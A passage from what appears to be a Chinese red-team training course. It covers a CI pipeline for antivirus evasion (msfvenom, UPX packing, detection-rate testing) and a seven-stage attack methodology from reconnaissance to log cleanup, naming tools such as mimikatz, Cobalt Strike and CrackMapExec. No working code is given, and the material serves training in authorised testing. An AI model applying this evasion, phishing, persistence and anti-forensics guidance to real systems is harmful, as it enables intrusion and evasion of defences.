• 凭证安全：CI变量要加密存储，避免泄露LHOST、VT API Key等敏感信息
• 环境差异：本地Runner与目标环境（Windows、Linux）差异要提前Mock测试

---

1.4 知识加油站

小贴士：
免杀流水线不是“把脚本一堆堆塞进去”就完事，核心是持续验证+快速反馈，遇到检测升级能立马迭代。

---

1.5 动手实验室

1. 搭建一套GitHub Actions：完成从msfvenom生成→UPX加壳→ClamAV测试→Slack通知的全流程。
2. 扩展测试：集成VirusTotal API，统计检测率并可视化（输出HTML表格）。
3. 闭环改进：一旦检测失败，自动新建Issue并标记“需改进”，实现DevOps式协作。

---

二、红队体系化作战流程

2.1 为什么要体系化？（总述）

红队作战不只是一次入侵，更是一套从侦察到清理、多团队协作的全流程战役。体系化能保证每个环节有章可循、可审计、可优化，就像现代化军队打仗：情报→打击→补给→收尾一个都不能少。

---

2.2 红队作战七大阶段

阶段	战术比喻	核心工作	关键输出
1. 侦察	侦察兵前线踩点	收集域名、IP、子网、员工社工信息	情报报告（Targets.xlsx）
2. 初始访问	破门斥候	利用钓鱼、漏洞、弱口令取得首个会话	初始Shell/Beacon会话
3. 权限升级	突击队突击	本地提权、绕过UAC、凭证转储	SYSTEM/DOMAIN ADMIN权限
4. 横向移动	装载车队	利用Pass-the-Hash/Pass-the-Ticket等	多台主机Meterpreter会话
5. 持久化	架桥补给	安排后门、计划任务、服务劫持	持久化脚本 & 监控文档
6. 目标达成	核心火力打击	数据窃取、敏感信息定位、权限滥用	敏感数据包、截图、键盘记录
7. 清理归航	撤离特种部队	日志清理、进程迁移、工单回溯	清理脚本、取证日志、交付报告

阶段细节与工具

1. 侦察

   • 工具：nmap、theHarvester、shodan、社工框架
   • 输出：资产清单、员工邮箱列表、VPN/外网入口

2. 初始访问

   • 工具：Metasploit Exploit、钓鱼平台（GoPhish）、Cobalt Strike
   • 注意：一定要设计“诱饵”页面/邮件，提高点击率

3. 权限升级

   • 工具：getsystem、Windows Exploit Suggester、linPEAS
   • 要点：先收集补丁信息，再精准选择提权模块

4. 横向移动

   • 工具：wmiexec.py、pth-toolkit、CrackMapExec
   • 要点：凭证复用+域信任利用+端口转发

5. 持久化

   • 工具：persistence脚本、schtasks、sc.exe、WMI Subscription
   • 要点：多种方式轮换执行，降低被发现概率

6. 目标达成

   • 工具：hashdump、mimikatz、SharpHound、BloodHound
   • 输出：敏感文档、PPT、数据库爆破结果等

7. 清理归航

   • 工具：clearev、wevtutil、forensic script
   • 严谨：交付红队报告时，附上“所有脚本+执行日志”供蓝队验证

---

2.3 坑位预警

• 跨阶段信息孤岛：侦察数据不共享，初始访问重复踩点，浪费时间
• 权限提升冲突：不同提权脚本互相影响，导致模块失效
• 持久化泛滥：过多后门拉长排查链路，易被蓝队暴露
• 清理不彻底：漏清EDR钩子、Registry痕迹，红队“行踪”暴露

---

2.4 知识加油站

小贴士：
完整的红队流程，不是单兵突击，而是团队协作+工具链联动+持续反馈。每个阶段都要产出可复现、可复盘的KPI指标和文档。

---

2.5 动手实验室

1. 演练一次小范围红队演习：3人一组，分工侦察、渗透、清理；全程记录时间、产出文档，赛后复盘。
2. 搭建红队运维面板：使用ELK或Splunk收集各阶段日志，实现实时可视化。
3. 撰写红队报告模板：包含情报摘要、攻击路径图、POC命令、复现步骤、建议修复措施。

---

三、总结（总述）

本节我们从自动化流水线的角度，实现了“从代码提交到合格载荷出厂”的一键化免杀；并梳理了红队体系化作战流程的七大核心阶段，配以关键工具和注意事项。
有了流水线，载荷生产更高效、可控；有了体系，作战更规范、可审计。二者结合，才能在红蓝对抗中赢得真正优势。

---